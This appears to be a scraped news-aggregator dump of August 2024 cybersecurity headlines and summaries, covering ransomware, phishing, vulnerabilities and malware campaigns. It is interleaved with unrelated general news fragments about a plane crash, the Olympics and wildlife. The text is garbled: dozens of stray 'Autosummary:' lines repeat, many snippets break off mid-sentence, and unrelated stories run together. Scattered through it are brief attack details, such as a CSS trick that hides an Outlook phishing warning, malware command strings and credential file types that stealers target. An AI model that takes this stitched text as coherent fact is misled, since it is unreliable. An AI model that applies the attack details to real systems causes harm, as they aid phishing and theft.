When it comes to phishing, timing matters Unfortunately, AI and PhaaS have made phishing easier, and we should expect threat actors to continue adopting these sorts of strategies. Phishing and football Similar attacks played out during the UEFA Euro 2024 football championship, Most notably, threat actors launched fraudulent mobile apps that impersonated the UEFA, the sporting association that organized the event.One popular answer is AI – particularly generative AI, which has made it trivially easier for threat actors to craft content that they can use in phishing campaigns, like malicious emails and, in more sophisticated cases, deepfake videos. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Since August 2023, Dispossessor—led by a threat actor known as Brain—has targeted small to mid-sized businesses in various sectors worldwide, claiming attacks against dozens of companies (the FBI identified 43 victims) from the U.S., Argentina, Australia, Belgium, Brazil, Honduras, India, Canada, Croatia, Peru, Poland, the United Kingdom, the United Arab Emirates, and Germany. "CISA has added six new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.
Autosummary:
"Autosummary:
They want either full payment, or a downpayment on an expensive item, via a payment method that is hard to trace, and even harder for you to get reimbursed (i.e., wire transfer, crypto, Zelle, Venmo, Cash App, etc). Using secure payment methods like credit cards, even disposable ones, instead of paying via gift cards or cryptocurrency, two methods that are popular among fraudsters but difficult to trace and recover Being skeptical of third-party sites Refusing to share any personal or financial information in your communications with sellers and buyers Using disposable phone numbers and email addresses so that you further protect your main contact information.Consider the following: Report the scam to the FTC (if you’re based in the US) and/or the FBI’s Internet Crime Complaint Center Keep a close eye on your bank and credit accounts and flag if there’s any suspicious activity Tell Craigslist that the listing was a scam, by clicking on the red flag icon and submitting a report File a report with the police Craigslist can be a great resource. "CISA has added six new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.
Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: August 2024 Patch Tuesday forecast: Looking for a calm August release August 2024 July ended up being more ‘exciting’ than many of us wanted; we’re supposed to be in the height of summer vacation season. First, we had a large set of updates on Patch Tuesday, then we had to work through the CrowdStrike event, and finally many of us … More
The post Week in review: Tips for starting your cybersecurity career, Patch Tuesday forecast appeared first on Help Net Security.
"Autosummary:
Number of incidents affecting GitHub, Bitbucket, GitLab, and Jira continues to rise Outages, human errors, cyberattacks, data breaches, ransomware, security vulnerabilities, and, as a result, data loss are the reality that DevSecOps teams have to face every few days, according to GitProtect.io.The featured vendors are: BackBox, Cybral, DryRun Security, HackNotice, Heeler Security, Hushmesh, MobileHop, Nagomi Security, Ox Security, Plainsea, Raven, Scribe Security, Spyderbat, and Xygeni. New infosec products of the week: August 9, 2024 Here’s a look at the most interesting products from the past week, featuring releases from: Rapid7, AppOmni, Contrast Security, Elastic, Cequence Security, Veza, ArmorCode, and EndorLabs. Securing against GenAI weaponization In this Help Net Security video, Aaron Fulkerson, CEO of Opaque, discusses how the weaponization of generative AI (GenAI) has made existing data privacy practices (like masking, anonymization, tokenization, etc.) "Autosummary:
"Autosummary:
Compromised data includes customer emails, full addresses, user IDs, products bought, and more.#USA… pic.twitter.com/lwwpoiLVpn — FalconFeeds.io (@FalconFeedsio) August 1, 2024 The threat actor claimed that the data breach had exposed over 30,812 records, including 30,400 emails. "Autosummary:
Their dog, Luna, boarded the plane with them, because Joslan"s mother could not stand to see him separated from their pet, said the family friend. "Autosummary:
Some things to look out for are: DLL files larger than 5MB in size in the "C:\Users\Public" directory Unsigned "msedgeupdate.dll" files in the file system A running process named "msiexec.exe" for each logged-in user The Russian cybersecurity firm concludes that APT27 and APT31 are likely working together in EastWind. "Autosummary:
Foreign nation-state actors hacked Donald Trump’s campaign Pierluigi Paganini August 11, 2024 August 11, 2024 Donald Trump’s campaign reported that its emails were hacked by “foreign sources hostile to the United States.” "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Brazil"s civil aviation agency said the plane, which was built in 2010, had been "in good operating condition, with valid registration and airworthiness certificates". "Autosummary:
The McLaren operates 14 hospitals in Michigan, ambulatory surgery centers, imaging centers, a 490-member employed primary and specialty care physician network, commercial and Medicaid HMOs covering more than 732,838 lives in Michigan and Indiana, home health, infusion and hospice providers, pharmacy services, a clinical laboratory network and a wholly owned medical malpractice insurance company.including billing or claims information, diagnosis, physician information, medical record number, Medicare/Medicaid information, prescription/medication information, diagnostic and treatment information. "Autosummary:
"Autosummary:
"The Network and Information Security (NIS) 2 Directive is possibly one of the most significant pieces of cybersecurity regulation to ever hit Europe. The 27 EU Member States have until 17 October 2024 to adopt and publish the standards necessary to comply with NIS2, which brings increased requirements to strengthen security conditions and report more regularly, with shorter deadlines, on cyber-attacks. The scope of the NIS2 directive has been dramatically broadened: in some countries, the … More
The post NIS2: A catalyst for cybersecurity innovation or just another box-ticking exercise? appeared first on Help Net Security.
"Autosummary:
AI can also provide advanced security services, for example, leveraging filtering and threat prevention to prevent sophisticated web-based threats, zero-day threats, evasive command-and-control attacks and DNS hijacking attacks. Ex-ante or ex-post risk measures Donald David Stewart Ferguson, an academic, argues that the limited effectiveness of the NIS2 Directive is primarily due to the narrow scope of the cybersecurity risk management measures, including the lack of specific measures focused on the reconnaissance phase of a cyberattack.Of course, sector-specific laws around cyber security already exist, but for businesses to achieve true holistic cybersecurity, they must adopt a tailored approach. "The sophistication of cyber threats has escalated dramatically, with malicious actors’ deploying advanced tactics, techniques, and procedures (TTPs) to exploit vulnerabilities and evade detection, according to Darktrace. Subscription-based tools such as Malware-as-a-Service (MaaS) and Ransomware-as-a-Service (RaaS) have also lowered the barrier-to-entry for less experienced attackers, making it easier to carry out complex, multistage attacks. “The threat landscape continues to evolve, but new threats often build upon old foundations rather than replacing them. While we have … More
The post Malware-as-a-Service and Ransomware-as-a-Service lower barriers for cybercriminals appeared first on Help Net Security.
"Autosummary:
MaaS continues to pose significant risk for organizations The findings show that cybercrime-as-a-service continues to dominate the threat landscape, with Malware-as-a-Service (MaaS) and Ransomware-as-a-Service (RaaS) tools making up a significant portion of malicious tools in use by attackers. "Autosummary:
"Autosummary:
"Autosummary:
Russian cyber spies stole data and emails from UK government systems Pierluigi Paganini August 09, 2024 August 09, 2024 Earlier this year, Russian cyber spies breached UK government systems and stole sensitive data and emails, reported The Record media. "A “0.0.0.0-Day” vulnerability affecting Chrome, Safari and Firefox can be – and has been – exploited by attackers to gain access to services on internal networks, Oligo Security researchers have revealed. The vulnerability stems from how those popular browsers handle network requests from external, public websites, and may allow attackers to change settings, gain access to protected information, uploading malicious models, or even achieve remote code execution. Attacks abusing it can succeed on vulnerable browsers … More
The post “0.0.0.0-Day” vulnerability affects Chrome, Safari and Firefox appeared first on Help Net Security.
"Autosummary:
The Private Network Access (PNA) specification makes a distinction between public, private, and local networks, and prevents pages loaded under a less-secure context (public network) from communicating with more-secure contexts (private network, local device), but it does not work when the request is sent to the 0.0.0.0 address. "Autosummary:
"Autosummary:
According to AMD"s advisory, the following models are affected: EPYC 1st, 2nd, 3rd, and 4th generations EPYC Embedded 3000, 7002, 7003, and 9003, R1000, R2000, 5000, and 7000 Ryzen Embedded V1000, V2000, and V3000 Ryzen 3000, 5000, 4000, 7000, and 8000 series Ryzen 3000 Mobile, 5000 Mobile, 4000 Mobile, and 7000 Mobile series Ryzen Threadripper 3000 and 7000 series AMD Threadripper PRO (Castle Peak WS SP3, Chagall WS) AMD Athlon 3000 series Mobile (Dali, Pollock) AMD Instinct MI300A AMD stated in its advisory that it has already released mitigations for its EPYC and AMD Ryzen desktop and mobile CPUs, with further fixes for embedded CPUs coming later. "Autosummary:
The zero-day impacts multiple 32-bit and 64-bit Office versions, including Office 2016, Office 2019, Office LTSC 2021, and Microsoft 365 Apps for Enterprise. "Autosummary:
ReasonLabs found the following Google Chrome extensions are linked to this campaign: Custom Search Bar – 40K+ users – 40K+ users yglSearch – 40K+ users – 40K+ users Qcom search bar – 40+ users – 40+ users Qtr Search – 6K+ users – 6K+ users Micro Search Chrome Extension – 180K+ users (removed from Chrome store) – 180K+ users (removed from Chrome store) First, remove the scheduled task from the Windows Task Scheduler, looking for suspicious entries that point to scripts such as "NvWinSearchOptimizer.ps1," usually located in "C:\Windows\system32\." Secondly, remove the malicious registry entries by opening the Registry Editor ("Win+R" > regedit) and navigating to: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallForcelist HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Edge\ExtensionInstallForcelist Right-click each key with the malicious extension"s name and select "Delete" to remove them. "Autosummary:
"Autosummary:
Pierluigi Paganini August 09, 2024 August 09, 2024 Cisco warns of critical remote code execution zero-day vulnerabilities impacting end-of-life Small Business SPA 300 and SPA 500 series IP phones. "Autosummary:
"Autosummary:
“When I heard the sound of the plane falling, I looked out my window at home and saw the moment it crashed," Felipe Magalhaes told Reuters news agency, adding that the sight left him "terrified". Another resident, Nathalie Cicari, told CNN Brasil she was having lunch when she heard a "very loud noise very close by", describing it like the sounds of a drone but "much louder". "Autosummary:
But earlier this year, he learned of a new, four-hour bus route that links Eureka, a city in northern California, to another city named Ukiah, about two hours north of San Francisco. "Ransomware groups continue to refine their craft, building and scaling business models that resemble legitimate corporate enterprises, according to Rapid7. They market their services to prospective buyers, offer company insiders commissions in exchange for access, and run formal bug bounty programs. In addition, Rapid7 researchers found three major clusters of ransomware families with similar source code, indicating that ransomware groups are focusing their development efforts on quality over quantity. “The Ransomware Radar Report uses data … More
The post Ransomware operators continue to innovate appeared first on Help Net Security.
"Autosummary:
"Here’s a look inside Startup City at Black Hat USA 2024. The featured vendors are: BackBox, Cybral, DryRun Security, HackNotice, Heeler Security, Hushmesh, MobileHop, Nagomi Security, Ox Security, Plainsea, Raven, Scribe Security, Spyderbat, and Xygeni.
The post Photos: Black Hat USA 2024 Startup City appeared first on Help Net Security.
"Autosummary:
"Autosummary:
This includes a unique, 3-part add on to your experience: extended OnDemand course, labs, and content access following the event from the course Author, AIS247: AI Security Essentials for Business Leaders course, plus admission to the AI Cybersecurity Summit @Night event, further enriching the on-site learning experience. "Autosummary:
The development comes amid the emergence of new ransomware families like Lynx, OceanSpy, Radar, Zilla (a Crysis/Dharma ransomware variant), and Zola (a Proton ransomware variant) in the wild, even as existing ransomware groups are constantly evolving their modus operandi by incorporating new tools into their arsenal. "Autosummary:
Historically, Royal actors were observed leveraging Chisel , Secure Shell (SSH) client, PuTTY, OpenSSH, and MobaXterm for C2 communications. "Autosummary:
Bayhealth Medical Center, serving central and southern Delaware, operates two hospitals: Bayhealth Hospital, Kent Campus in Dover and Bayhealth Hospital, Sussex Campus in Milford, along with the Bayhealth Emergency Center in Smyrna. The ransomware gang hit organizations in multiple industries, including the education, healthcare, manufacturing, information technology, and government sectors. "Attackers looking for a way into organizations using Microsoft 365 can make an alert identifying unsolicited (and thus potential phishing) emails “disappear”. “When an Outlook user receives an e-mail from an address they don’t typically communicate with, Outlook shows an alert which reads ‘You don’t often get email from xyz@example.com. Learn why this is important’. This is what Microsoft calls the First Contact Safety Tip, and it is one of the various anti-phishing measures available … More
The post Microsoft 365 anti-phishing alert “erased” with one simple trick appeared first on Help Net Security.
"Autosummary:
And while the email preview with still show the Safety Tip, the body of the email won’t: The alert can’t be seen in the email body (Source: CertITude) Similarly, to improve the chances of the email being considered legitimate and benign, phishers can also add more HTML code to fake Outlook’s “Signed by xyz@example.com” declaration. "A researcher has developed a downgrade attack that can make Windows machines covertly, persistently and irreversibly vulnerable, even if they were fully patched before that. A downgrade attack exploiting the Windows Update process The direction of SafeBreach researcher Alon Leviev’s probing was inspired by the BlackLotus UEFI bootkit, which was able to bypass the UEFI Secure Boot by exploiting a vulnerability, as well as disable Windows security mechanisms (e.g., BitLocker, HVCI, and Windows Defender) and … More
The post “Perfect” Windows downgrade attack turns fixed vulnerabilities into zero-days appeared first on Help Net Security.
"Autosummary:
Two zero-days, yet unpatched The researcher exploited two currently unpatched zero-day elevation of privilege vulnerabilities (CVE-2024-38202, CVE-2024-21302) in the Windows Update Stack and Windows Secure Kernel, respectively, to reintroduce previously mitigated vulnerabilities, circumvent some VBS features, and exfiltrate data protected by VBS. A downgrade attack exploiting the Windows Update process The direction of SafeBreach researcher Alon Leviev’s probing was inspired by the BlackLotus UEFI bootkit, which was able to bypass the UEFI Secure Boot by exploiting a vulnerability, as well as disable Windows security mechanisms (e.g., BitLocker, HVCI, and Windows Defender) and persist on compromised machines. "Autosummary:
"The attackers chose a group of the best-known websites in computing to craft the threat, including Google and WhatsApp to host the attack elements, and an Amazon look-alike to harvest the victim"s information," Menlo Security researcher Ashwin Vamshi said. "Autosummary:
"Autosummary:
"Autosummary:
Number of public sites communicating with 0.0.0.0 Source: Oligo Security In response to Oligo"s disclosure of this activity, the web browser developers are finally starting to take action: Google Chrome, the world"s most popular web browser, has decided to take action and block access to 0.0.0.0 via a gradual rollout lasting from version 128 (upcoming) until version 133. Malicious request seen in the Selenium attacks Source: Oligo Security Finally, the "ShellTorch" vulnerability was reported by Oligo in October 2023, where the TorchServe web panel was bound to the 0.0.0.0 IP address by default instead of localhost, exposing it to malicious requests. For impacted devices, threat actors can exploit this flaw to remotely change settings, gain unauthorized access to protected information, and, in some cases, achieve remote code execution. "Autosummary:
The threat actor says the leaked data includes 30,800 customer records, including customer emails, complete addresses, user IDs, and the products purchased. "Autosummary:
Today, money moves at the click of a button, and law enforcement must be able to move as fast to protect our citizens," said David Chew, Director of the Singapore Police Force"s Commercial Affairs Department. "Autosummary:
"Autosummary:
The lawsuit, filed in a federal courthouse in Massachusetts - where several of the companies are based - argued that the "flood" of illegal guns in Mexico "is the foreseeable result of the defendants" deliberate actions and business practices". "Autosummary:
Steady ahead Camera and motion capture technology enabled researchers to observe two Nankeen Kestrels, called Kevy and Jedda, as they hovered in a wind tunnel operated by RMIT. "Autosummary:
Demonstration of Apache OFBiz flaw New pre-auth RCE As CISA warns about active exploitation for CVE-2024-32113, a newer flaw that impacts more recent versions of Apache OFBiz was uncovered earlier this week. "Autosummary:
"Autosummary:
Vulnerability details Cisco has disclosed five flaws, three rated critical (CVSS v3.1 score: 9.8) and two categorized as high-severity (CVSS v3.1 score: 7.5). "Autosummary:
What the future holds for business cybersecurity, according to cyber insurers The cyber risk insurance ecosystem is changing, moving from human-based underwriting, annual policies, with dozens of inputs and physical forms to a machine-augmented, continuous monitoring of zillions of inputs, all in the digital realm. "Autosummary:
“When the performance is lacking, I’m like, ‘Man, I hope I didn’t make you all disappointed,’” he said.Hassan, 26, told the BBC he was “very happy” to be his nation’s solitary envoy at Paris 2024, but admitted there was a flipside: “I feel very sad when I’m alone. "Outages, human errors, cyberattacks, data breaches, ransomware, security vulnerabilities, and, as a result, data loss are the reality that DevSecOps teams have to face every few days, according to GitProtect.io. DevSecOps The possibility to integrate security in development processes has given rise to DevSecOps, where development and operations teams work together with security teams and all their processes are converged. In DevSecOps, security is not an afterthought but a fundamental component integrated from the outset … More
The post Number of incidents affecting GitHub, Bitbucket, GitLab, and Jira continues to rise appeared first on Help Net Security.
"Autosummary:
Outages, human errors, cyberattacks, data breaches, ransomware, security vulnerabilities, and, as a result, data loss are the reality that DevSecOps teams have to face every few days, according to GitProtect.io. In 2023, the number of events with the greatest negative impact on the operation of DevOps services – GitHub, Bitbucket, GitLab, and Jira – did not exceed 14%: GitHub recorded 13.94% events Bitbucket 8,33% GitLab 7,89% Jira only 4% Most issues affected components’ operation, resulting in degraded performance at various levels. "Forescout has published a new report examining the current state of the software supply chain in OT/IoT routers. The study uncovered that OT and IoT cellular routers and those used in small offices and homes contain outdated software components associated with known (“n-day”) vulnerabilities. The research showed that widely used OT/IoT router firmware images have, on average, 20 exploitable n-day vulnerabilities affecting the kernel, leading to increasing security risks. Number of historical vulnerabilities by CVSS … More
The post OpenWrt dominates, but vulnerabilities persist in OT/IoT router firmware appeared first on Help Net Security.
"Autosummary:
On average, 41% of binaries across firmware images use RELRO, 31% use stack canaries, 65% use NX, 75% use PIE, 4% use RPath, and 35% have debugging symbols.On average, 41% of binaries across firmware images use RELRO, 31% use stack canaries, 65% use NX, 75% use PIE, 4% use RPath, and 35% have debugging symbols. On average, firmware images had 161 known vulnerabilities in their most common components: 68 with a low or medium CVSS score, 69 with a high score, and 24 with a critical score. "Autosummary:
"Autosummary:
"I"ve had the experience of people showing me AI film work, for example, and being like, "oh, look how amazing this is"," he says. Surgent Studios Abu also voiced the main character in the English dub of his game Tales of Kenzera: Zau "I think it will probably cost more really, truly, because let"s say you make a whole game based on AI voices and you realise that the voices aren"t necessarily that great," he says. "Autosummary:
"Jessica" told Tidy that he would have to address her as "Miss Queen" and ”do exactly as she said", which included promising to go to Chicago to buy her "a romantic gift or meal" with some of the profits she assured him he would make. In Tidy"s case, "Jessica" asked for an initial investment and then made him go through a series of fake cryptocurrency investments where he was shown that his "profits" were "increasing. "Autosummary:
Mr McMahon warned people could "expect the full force of the law" if they "cross the line", whether it is "on the street or online". "Autosummary:
On June 25, 2024, Progress released a security bulletin warning about fifteen high and critical-severity bugs, including CVE-2024-4885, a 9.8-rated critical RCE flaw. "Autosummary:
The warning tip rendered on the Outlook app Source: Certitude Certitude discovered that it"s possible to hide this safety message by manipulating the CSS (Cascading Style Sheets) within the HTML of the email, as shown below: HTML code used for the bypass Source: Certitude The role of each rule is the following: a { display: none; }: Hides any anchor (<a>) "Autosummary:
"Autosummary:
Compromised data included names, Social Security numbers, health insurance and physician information, as well as Medicare/Medicaid, prescription/medication, and diagnostic results and treatment information. "Autosummary:
"Autosummary:
In March 2023 and a subsequent November 2023 advisory update, the two agencies shared indicators of compromise and a list of tactics, techniques, and procedures (TTPs) to help defenders block the gang"s attempts to deploy ransomware on their networks. "Autosummary:
An interesting and somewhat unusual feature is the targeting of files that might contain account credentials such as .pfx, .p12, .kdb, .kdbx, .lastpass, .psafe3, .pem, .key, .private, .asc, .gpg, .ovpn, and .log files. "Autosummary:
An attacker can trigger the vulnerability to execute arbitrary JavaScript in the victim’s browser when they view a malicious email, potentially leading to the theft of emails, contacts, passwords, and unauthorized email sending. "Autosummary:
Kevin claims there are “more than 30” people in the US, UK, Pakistan and India who work for the site, usually recruited from sites for freelancers - including Farhan and James.The BBC has tracked down several people linked to Channel3Now, spoken to their friends and colleagues, who have corroborated that they are real people, and questioned a person who claims to be the “management” at the site.He says how Farhan in particular was not involved in the false Southport story, which the site has publicly apologised for, and blamed “our UK-based team”.Kevin says he is speaking to me from the site’s “main office” in the US - which fits with both the timings of the social media posts on some of the site"s social media profiles, and the times Kevin replies to my emails. "Autosummary:
In March 2023 and a subsequent November 2023 advisory update, the two agencies shared indicators of compromise and a list of tactics, techniques, and procedures (TTPs) to help defenders block the gang"s attempts to deploy ransomware on their networks. "Highlighting growth of phishing and digital scams targeting United States citizens, Bolster released a research that identified 24 separate nation-state threat actor groups attempting to exploit rising political tensions across the US to interfere with the 2024 presidential election. “We know the frequency of phishing attacks is increasing, as hackers utilize AI to execute more scams than ever before. In fact, phishing scams are being hosted in the US at a rate of nearly double, … More
The post AI-fueled phishing scams raise alarm ahead of U.S. presidential election appeared first on Help Net Security.
"Autosummary:
“More troubling, our researchers identified packages of voter data stolen over the past decade, for sale on the dark web and used by threat actors to create fake identification cards, potentially leading to identity theft or voter fraud.” "Autosummary:
"Autosummary:
"Autosummary:
BleepingComputer, which has a dedicated forum for ransomware victims, reports: “A massive Magniber ransomware campaign is underway, encrypting home users’ devices worldwide and demanding thousand-dollar ransoms to receive a decryptor.” How home users can prevent ransomware There are some rules that can help you avoid falling victim to this type of ransomware: Make sure your system and software are on the latest version. "Autosummary:
Android Security Bulletin for August 2024 addressed a total of 47 vulnerabilities in Framework (13), System (1), Kernel (1), Arm components (2), Imagination Technologies (1), MediaTek components (1), Qualcomm components (21), and Qualcomm closed-source components (7). "Autosummary:
However, claims that the attack affected other museums, including the prestigious Louvre—which is especially vital during the current tourism boom—were disputed on X by the Louvre"s director, Matthias Grolier. "Autosummary:
Android partners, such as Samsung, Sony, etc, are notified of all issues at least a month before publication, however, this doesn’t always mean that the patches are available for devices from all vendors. "Autosummary:
It is also possible to fix errors yourself by getting a free credit report from the likes of Equifax, Experian, and TransUnion, and disputing any mistakes you might see with the credit bureau. "Ransomware-as-a-service outfit Hunters International is wielding a new remote access trojan (RAT). “The malware, named SharpRhino due to its use of the C# programming language, is delivered through a typosquatting domain impersonating the legitimate tool Angry IP Scanner,” Quorum Cyber researchers discovered. Angry IP Scanner is an IP address and port scanner, and as such is more likely to be downloaded and used by IT workers. Such specific targeting might be an attempt to compromise … More
The post Ransomware gang targets IT workers with new RAT masquerading as IP scanner appeared first on Help Net Security.
"Autosummary:
Typical of ransomware operators, Hunters International exfiltrates data from victim organisations prior to encrypting files, changing file extensions to .locked, and leaving a README message guiding recipients to a chat portal on the TOR network for payment instructions,” the researchers noted. "Autosummary:
Specifically, cryptocurrency addresses controlled by Cryptonator transacted with darknet markets, virtual exchanges, and criminal marketplaces like Bitzlato, Blender, Finiko, Garantex, Hydra, Nobitex, and an unnamed terrorist entity. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a deserialization of untrusted data vulnerability in Microsoft COM for Windows, tracked as CVE-2018-0824 (CVSS score of 7.5), to its Known Exploited Vulnerabilities (KEV) catalog. "Autosummary:
"Autosummary:
"Autosummary:
"As businesses strive to protect their data and privacy, the demand for skilled cybersecurity professionals continues to grow. This article provides expert advice to help you navigate the early stages of your cybersecurity career, offering practical tips and insights. Brian Honan, CEO at BH Consulting When advising people at the start of their cybersecurity careers, I recommend that they focus on human networking. I strongly recommend that people get involved in the cybersecurity community/industry. This … More
The post How to start your cybersecurity career: Expert tips and guidance appeared first on Help Net Security.
"Autosummary:
Biljana Cerin, Information Risk, Business Development and Project Lead, Infoedge My opinion about starting a career in cybersecurity is a very strong one: if you don’t have a true passion for the field, if you find it a “trendy” profession at the moment, and are not willing to learn, listen, and expand your professional comfort zone every day, taking full responsibility for your actions, you should stay away from it.These domains include SOC processes & methodologies, SIEM operations, tactical analysis, log analysis, threat hunting, Active Directory attack analysis, network traffic analysis, malware analysis, and DFIR operations.I would recommend vital networking through professional associations, and as soon as you feel confident about some, no matter how small, professional domain, I’d suggest getting “out there” and presenting your knowledge – within your team, a department maybe as the next step, and as you grow further, through available professional communities’ events. Once the answer is yes to both of these questions, I’d try and find a mentor who can guide me through the significant amount of information, knowledge, and requirements related to the field and pursuing formal education through colleges, universities, or specialised seminars by well-respected organizations, should the finances or arrangements with the employer allow.As a result, individuals looking to start or pivot into a cybersecurity career must find alternative ways to gain these practical skills, such as self-teaching, internships, apprenticeships, or on-the-job training. "In this Help Net Security video, Beth Miller, Field CISO at Code42, highlights a significant trend: 73% of life sciences companies turn to AI to address the cybersecurity skills gap, surpassing adoption rates in other industries. Underresourced security teams face increasing insider-driven data loss events, exacerbated by emerging technologies like AI and GenAI. Leaked trade secrets or critical intellectual property – research data, customer lists, pricing decks, formulary plans, clinical trial data, and source code … More
The post How life sciences companies use AI to fill the cybersecurity skills gap appeared first on Help Net Security.
"Autosummary:
"Security operation centers (SOCs) need to be better equipped to manage the sheer scale of data to monitor and the increasing sophistication of threats. SOC analysts face a daunting task: sifting through thousands of alerts every day – most of which are false positives – while swiftly identifying and mitigating genuine threats. Many organizations have turned to AI to alleviate their SOC analysts’ load, but some cybersecurity workers fear that there may come a time … More
The post The role of AI in cybersecurity operations appeared first on Help Net Security.
"Autosummary:
For example, AI-powered solutions can automate routine activities like alert triaging, log analysis, and vulnerability scanning, enabling human analysts to allocate their time and expertise toward more critical endeavors such as threat hunting, incident response planning, and security architecture design. As technologies like AI SOC analysts advance, they do not eclipse the need for human oversight; instead, they create opportunities for cybersecurity professionals to engage in more meaningful, analytical, and creative problem-solving tasks. "Autosummary:
The names of some of the malicious APK files containing BlankBot are listed below - app-release.apk (com.abcdefg.w568b) app-release.apk (com.abcdef.w568b) app-release-signed (14).apk (com.whatsapp.chma14) app.apk (com.whatsapp.chma14p) app.apk (com.whatsapp.w568bp) showcuu.apk (com.whatsapp.w568b) Like the recently resurfaced Mandrake Android trojan, BlankBot implements a session-based package installer to circumvent the restricted settings feature introduced in Android 13 to block sideloaded applications from directly requesting dangerous permissions. "Autosummary:
However, to ensure compliance with cybersecurity regulations that might now be challenged in court, companies should: Assess existing cybersecurity requirements to ensure they align with current regulations that are supported by clear statutory authority. The Loper Bright decision by the U.S. Supreme Court overruled the Chevron deference, stating that courts, not agencies, will decide all relevant questions of law arising on review of agency action. TSA"s emergency amendments in 2022 for cybersecurity requirements for passenger and freight railroad carriers, as well as airport and aircraft operators, may be challenged. "Autosummary:
“As previously disclosed, Key Tronic detected a cybersecurity incident on May 6, 2024 that caused disruptions and limited access to portions of the Company’s business applications supporting operations and corporate functions, including financial and operating reporting systems, at its Mexico and U.S. sites during the fourth quarter of fiscal 2024.” "Autosummary:
Some of the notable victims include German defense contractor Rheinmetall, government contractor ABB, U.S. healthcare giant Ascension, U.K. tech outsourcing firm Capita, the American Dental Association, Hyundai"s European division, the Toronto Public Library, and Yellow Pages Canada. "Autosummary:
WhatsApp, Chrome, Telegram, Facebook, Instagram, Gmail, Skype, Vkontakte, Snapchat, and Discord are among the many supported for selective screen capturing, which minimizes the risk of detection.Disable screen recording *swl Set new app list, stored right after command string, for screen recording *wif+ Allow to run if device is connected to Wi-Fi *wif- Prohibit from running if device is connected to Wi-Fi only *mob+ Allow to run if device is connected to mobile network *mob- "Autosummary:
Warning when opening downloaded files (BleepingComputer) To exploit this design flaw, one can append a dot or space to the target executable path (for instance, after a binary"s extension like "powershell.exe.") or create an LNK file containing a relative path, such as ".\target.exe". "Autosummary:
When the trojanized software was installed, the malware was also deployed to capture screenshots, steal data stored in browsers (credentials, cookies, bookmarks, history), and steal GPKI certificates, SSH keys, Sticky Notes, and FileZilla data. "IBM generative AI capabilities to its managed Threat Detection and Response Services utilized by IBM Consulting analysts to advance and streamline security operations for clients. Built on IBM’s watsonx data and AI platform, the new IBM Consulting Cybersecurity Assistant is designed to accelerate and improve the identification, investigation and response to critical security threats. In addition to being included in IBM Consulting’s threat detection and response practice, the Cybersecurity Assistant will be part of IBM … More
The post IBM Consulting Cybersecurity Assistant helps clients accelerate alert investigation appeared first on Help Net Security.
"Autosummary:
Built into IBM’s TDR Services, the new capability cross-correlates alerts and enhances insights from SIEM, network, EDR, vulnerability, and telemetry to provide a holistic and integrative threat management approach. "Autosummary:
Earlier this year, Google patched another zero-day exploited in attacks: a high-severity elevation of privilege (EoP) flaw in the Pixel firmware, tracked as CVE-2024-32896 by Google and CVE-2024-29748 by GrapheneOS (which found and reported the flaw). "Autosummary:
Two commands are hardcoded onto the malware, namely "delay," to set the timer of the next POST request for retrieving a command, and "exit," to terminate its communication. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Why a strong patch management strategy is essential for reducing business risk In this Help Net Security interview, Eran Livne, Senior Director of Product Management, Endpoint Remediation at Qualys and Thomas Scheffler, Security Operations Manager of Cintas Corporation, discuss their experiences with automated patch management. Securing remote access to mission-critical OT assets In this Help Net Security interview, Grant Geyer, … More
The post Week in review: VMware ESXi zero-day exploited, SMS Stealer malware targeting Android users appeared first on Help Net Security.
"Autosummary:
Infosec products of the month: July 2024 Here’s a look at the most interesting products from the past month, featuring releases from: AttackIQ, AuditBoard, Black Kite, BlueVoyant, Druva, GitGuardian, Invicti Security, IT-Harvest, LogRhythm, LOKKER, NordVPN, Pentera, Permit.io, Prompt Security, Quantum Xchange, Regula, Rezonate, Scythe, Secure Code Warrior, and Strata Identity.Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Why a strong patch management strategy is essential for reducing business risk In this Help Net Security interview, Eran Livne, Senior Director of Product Management, Endpoint Remediation at Qualys and Thomas Scheffler, Security Operations Manager of Cintas Corporation, discuss their experiences with automated patch management. New infosec products of the week: August 2, 2024 Here’s a look at the most interesting products from the past week, featuring releases from: Adaptive Shield, Fortanix, Clutch Security, Nucleus Security, Wing Security and Synack. "Autosummary:
Upon information and belief, such sensitive information includes, but is not limited to, Plaintiff’s and Class Members’ full names; current and past addresses (spanning at least the last three decades); Social Security numbers; information about parents, siblings, and other relatives (including some who have been deceased for nearly 20 years); and/or other personal information (collectively defined herein as “PII”).” "Autosummary:
"Autosummary:
Once launched, the ransomware encrypts files on the device and appends a random 5-9 character extension, like .oaxysw or .oymtk, to encrypted file names. "Autosummary:
Chinese StormBamboo APT compromised ISP to deliver malware Pierluigi Paganini August 04, 2024 August 04, 2024 A China-linked APT, tracked as StormBamboo, compromised an internet service provider (ISP) to poison software update mechanisms with malware. Macma is a modular backdoor that supports multiple functionalities, including device fingerprinting, executing commands, screen capture, keylogging, audio capture, uploading and downloading files. "Autosummary:
"Autosummary:
The three contained three files, a copy of the legitimate Windows calculator executable calc.exe that masquerades as an image file (“IMG-387470302099.jpg.exe”), a DLL (“WindowsCodecs.dll”), and a batch file (“zqtxmo.bat”).Russia-linked APT used a car for sale as a phishing lure to target diplomats with HeadLace malware Pierluigi Paganini August 03, 2024 August 03, 2024 A Russia-linked APT used a car for sale as a phishing lure to deliver a modular Windows backdoor called HeadLace. "Autosummary:
SLUBStick exploits a heap vulnerability, such as a double-free, user-after-free, or out-of-bounds write, to manipulate the memory allocation process. "Autosummary:
"Autosummary:
It was not until Thursday, during the large scale Russia-West prisoner swap, that the Kremlin spies, and their children, were returned to Russia. "Autosummary:
"Autosummary:
